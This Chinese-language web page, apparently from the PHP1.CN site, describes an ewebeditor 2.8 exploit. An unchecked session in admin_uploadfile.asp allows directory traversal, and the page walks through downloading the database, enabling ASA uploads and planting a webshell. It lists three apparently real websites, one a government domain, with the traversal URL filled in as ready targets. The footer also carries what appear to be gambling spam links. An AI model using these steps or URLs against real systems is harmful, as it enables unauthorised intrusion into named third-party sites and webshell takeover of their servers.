当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

最新漏洞利用ewebeditor2.8Xday

ewebeditor2.8漏洞漏洞利用:各版本ewebeditor快速拿webshell.eWebEditoradminlogin.php,进入后台后随便输入一个用户和密码,当然会提示出错了....Xday,2.8,ewebeditor,利用,最新漏洞,.最新漏洞利用ewebeditor2.8Xday
ewebeditor 2.8漏洞最新漏洞利用:ewebeditor 2.8前几天爆出严重漏洞 由于某些修正版本对admin_uploadfile.asp文件的session没过滤好.所以造成不需要验证直接列目录,然后跟在URL中输入,查找到数据库路径 然后下载,进后台设置ASA 上传得到WEBSHELL11
 
 
http://www.eastlaborlaw.com/admin_dbh/ewebEditor_liangcai/admin_uploadfile.asp?id=&dir=../..
 
http://www.czmilan.com/xmlEditor/ewebeditor/admin_uploadfile.asp?id=&dir=../..
 
http://wujia.huizhou.gov.cn/xdocweb/webeditor/admin_uploadfile.asp?id=&dir=../..
吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | 凯发国际娱乐 | 凯发国际娱乐下载 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有